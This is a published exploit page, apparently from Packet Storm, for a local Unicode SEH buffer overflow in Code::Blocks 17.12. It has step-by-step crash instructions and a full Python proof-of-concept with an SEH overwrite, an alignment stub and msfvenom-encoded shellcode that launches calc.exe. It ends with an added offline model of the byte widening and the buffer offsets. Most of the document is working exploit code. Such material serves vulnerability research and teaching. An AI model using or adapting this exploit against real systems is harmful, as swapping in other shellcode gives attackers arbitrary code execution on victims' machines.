Code Blocks 17.12 Local Buffer Overflow ≈ Packet Storm

Published on June 21st, 2020

# Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)
# Vendor Homepage: http://www.codeblocks.org/
# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-16
# Vulnerable Software: Code Blocks
# Version: 17.12
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

#Steps to Produce the Crash:

# 1.- Run the Python script codeblocks.py (it writes codeblocks.txt)
# 2.- Copy the content of codeblocks.txt to the clipboard
# 3.- Turn off DEP for codeblocks.exe
# 4.- Open "codeblocks.exe"
# 5.- Go to "File" > "New" > "Project..."
# 6.- Click on "Files" in the left box > Select "C/C++ header" > Click on "Go" > Click on "Next"
# 7.- Paste the clipboard content into the "Filename with full path:" field
# 8.- Click on "Finish"
# 9.- Calc.exe runs

#################################################################################################################################################

#Python "codeblocks.py" Code:

# Written for Python 2, where str is a byte string and the \x escapes below
# are written to the file verbatim. Under Python 3 the text-mode write goes
# through the locale codec: on a cp1252 (English Windows) locale every byte
# used here round-trips unchanged, but on a UTF-8 locale \xe0 becomes c3 a0
# and the SEH address is corrupted.
f = open("codeblocks.txt", "w")

junk1 = "A" * 2006

nseh = "\x61\x62" #popad / align

#Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible ** ** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\CodeBlocks\codeblocks.exe
seh = "\xe0\x50" #read as 0x005000E0 once the input has been expanded to UTF-16

#Venetian stub: leaves eax = ebx + 0x100 and jumps there
ven = "\x62" #align
ven += "\x53" #push ebx
ven += "\x62" #align
ven += "\x58" #pop eax
ven += "\x62" #align
ven += "\x05\x14\x11" #add eax, 0x11001400
ven += "\x62" #align
ven += "\x2d\x13\x11" #sub eax, 0x11001300
ven += "\x62" #align

ven += "\x50" #push eax
ven += "\x62" #align
ven += "\xc3" #ret

junk2 = "\x41" * 108 #padding so that eax (ebx + 0x100 after the stub) points at the start of the shellcode

#msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -e x86/unicode_mixed BufferRegister=EAX
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x48\x68\x71\x72"
buf += "\x69\x70\x4b\x50\x49\x70\x73\x30\x53\x59\x69\x55\x50"
buf += "\x31\x49\x30\x33\x34\x62\x6b\x62\x30\x50\x30\x74\x4b"
buf += "\x42\x32\x6a\x6c\x62\x6b\x30\x52\x6d\x44\x74\x4b\x52"
buf += "\x52\x6c\x68\x5a\x6f\x34\x77\x6f\x5a\x4e\x46\x50\x31"
buf += "\x6b\x4f\x74\x6c\x4f\x4c\x6f\x71\x31\x6c\x6d\x32\x4c"
buf += "\x6c\x6f\x30\x56\x61\x66\x6f\x6a\x6d\x4b\x51\x69\x37"
buf += "\x67\x72\x48\x72\x42\x32\x6f\x67\x72\x6b\x52\x32\x5a"
buf += "\x70\x72\x6b\x70\x4a\x4d\x6c\x32\x6b\x6e\x6c\x5a\x71"
buf += "\x64\x38\x7a\x43\x31\x38\x4b\x51\x36\x71\x42\x31\x34"
buf += "\x4b\x30\x59\x4b\x70\x39\x71\x79\x43\x62\x6b\x6d\x79"
buf += "\x6b\x68\x6a\x43\x6c\x7a\x70\x49\x62\x6b\x50\x34\x52"
buf += "\x6b\x59\x71\x69\x46\x4c\x71\x79\x6f\x34\x6c\x65\x71"
buf += "\x46\x6f\x4c\x4d\x7a\x61\x76\x67\x70\x38\x6b\x30\x30"
buf += "\x75\x6c\x36\x79\x73\x63\x4d\x49\x68\x6d\x6b\x31\x6d"
buf += "\x6f\x34\x63\x45\x67\x74\x6e\x78\x54\x4b\x72\x38\x6c"
buf += "\x64\x4b\x51\x77\x63\x71\x56\x74\x4b\x6a\x6c\x6e\x6b"
buf += "\x64\x4b\x32\x38\x4b\x6c\x6a\x61\x38\x53\x74\x4b\x6b"
buf += "\x54\x34\x4b\x4a\x61\x68\x50\x44\x49\x4e\x64\x6f\x34"
buf += "\x4c\x64\x51\x4b\x4f\x6b\x53\x31\x6e\x79\x71\x4a\x32"
buf += "\x31\x79\x6f\x69\x50\x4f\x6f\x4f\x6f\x4f\x6a\x64\x4b"
buf += "\x6e\x32\x58\x6b\x54\x4d\x6f\x6d\x30\x6a\x4b\x51\x64"
buf += "\x4d\x45\x35\x55\x62\x49\x70\x4d\x30\x4d\x30\x72\x30"
buf += "\x73\x38\x4d\x61\x52\x6b\x72\x4f\x54\x47\x79\x6f\x66"
buf += "\x75\x75\x6b\x68\x70\x35\x65\x45\x52\x6f\x66\x4f\x78"
buf += "\x73\x76\x56\x35\x75\x6d\x35\x4d\x79\x6f\x69\x45\x4d"
buf += "\x6c\x79\x76\x43\x4c\x6b\x5a\x45\x30\x59\x6b\x57\x70"
buf += "\x34\x35\x49\x75\x57\x4b\x6e\x67\x4e\x33\x32\x52\x52"
buf += "\x4f\x71\x5a\x49\x70\x51\x43\x6b\x4f\x69\x45\x62\x43"
buf += "\x43\x31\x52\x4c\x33\x33\x4e\x4e\x31\x55\x31\x68\x53"
buf += "\x35\x6d\x30\x41\x41"

junk3 = "\x62" * 5000 #padding to trigger the overflow

payload = junk1 + nseh + seh + ven + junk2 + buf + junk3

f.write(payload)
f.close()
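The following is an added example and is not part of the advisory or of the author's PoC. It models offline what the PoC relies on: once the pasted file name is widened to UTF-16LE, every byte becomes a 16-bit code unit, so the two-byte SEH field "\xe0\x50" is read by the dispatcher as 0x005000E0, and the alignment stub nets out to eax = ebx + 0x100. It also reports which byte values do not survive the widening as "xx 00", and where the overwritten exception registration record sits in the expanded buffer. The model assumes the English Windows ANSI code page (cp1252) for the widening; the ebx value in the usage section is a placeholder, since the real register contents at crash time are what the 108-byte junk2 padding was tuned against.

```python
"""Offline model of the Unicode SEH layout used by the codeblocks.py PoC.

Added example (not part of the advisory). Assumes the English Windows ANSI
code page, cp1252, for the ANSI -> UTF-16LE widening of the pasted file name.
"""
import struct

# Fields copied from the PoC above.
JUNK1_LEN = 2006
NSEH = b"\x61\x62"   # popad / align
SEH = b"\xe0\x50"    # pop pop ret, read as 0x005000E0 after widening
VEN = b"\x62\x53\x62\x58\x62\x05\x14\x11\x62\x2d\x13\x11\x62\x50\x62\xc3"


def unicode_expand(data: bytes) -> bytes:
    """Model the cp1252 -> UTF-16LE widening: every byte becomes a 16-bit
    unit. ASCII and 0xA0-0xFF come back as 'xx 00'; 0x80-0x9F do not."""
    return data.decode("cp1252").encode("utf-16-le")


def bad_bytes(candidate: bytes) -> list:
    """Byte values that do not survive widening as 'xx 00' and therefore
    cannot be used where the payload relies on the byte/null interleave.
    NUL is not flagged: the string copy stops on it, not the codec."""
    bad = []
    for b in sorted(set(candidate)):
        try:
            widened = unicode_expand(bytes([b]))
        except UnicodeDecodeError:  # cp1252 leaves 0x81,0x8D,0x8F,0x90,0x9D undefined
            bad.append(b)
            continue
        if widened != bytes([b, 0x00]):
            bad.append(b)
    return bad


def seh_handler_address(seh_field: bytes) -> int:
    """The little-endian DWORD the dispatcher reads from the widened record."""
    return struct.unpack("<I", unicode_expand(seh_field))[0]


def venetian_eax(ebx: int) -> int:
    """Net effect of the stub: push ebx / pop eax ; add eax, 0x11001400 ;
    sub eax, 0x11001300  ->  eax = ebx + 0x100, with 32-bit wraparound."""
    eax = (ebx + 0x11001400) & 0xFFFFFFFF
    eax = (eax - 0x11001300) & 0xFFFFFFFF
    return eax


def expanded_offsets(junk1_len: int = JUNK1_LEN) -> dict:
    """Byte offsets of the overwritten registration record in the widened
    buffer: the 2006 'A's occupy 4012 bytes, then nSEH (4), then SEH (4)."""
    nseh = junk1_len * 2
    return {"nseh": nseh, "seh": nseh + 4, "stub": nseh + 8}


if __name__ == "__main__":
    print("SEH handler -> 0x%08X" % seh_handler_address(SEH))
    print("stub bytes that break under cp1252:", bad_bytes(VEN))
    print("all bad bytes:", ["0x%02x" % b for b in bad_bytes(bytes(range(256)))])
    # Placeholder ebx (assumption): the real value is whatever the register
    # holds when the handler runs, which is why junk2 was sized by hand.
    print("eax after stub with ebx=0x0018F000 -> 0x%08X" % venetian_eax(0x0018F000))
    print("record offsets:", expanded_offsets())
```

Running bad_bytes over the full 0x00-0xFF range shows that only 0x80-0x9F are unusable under cp1252, which is why the pop-pop-ret address bytes \xe0 and \x50 and the stub opcode \xc3 can be used directly; the shellcode itself avoids the question by being emitted with the x86/unicode_mixed encoder, which uses only alphanumeric bytes.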
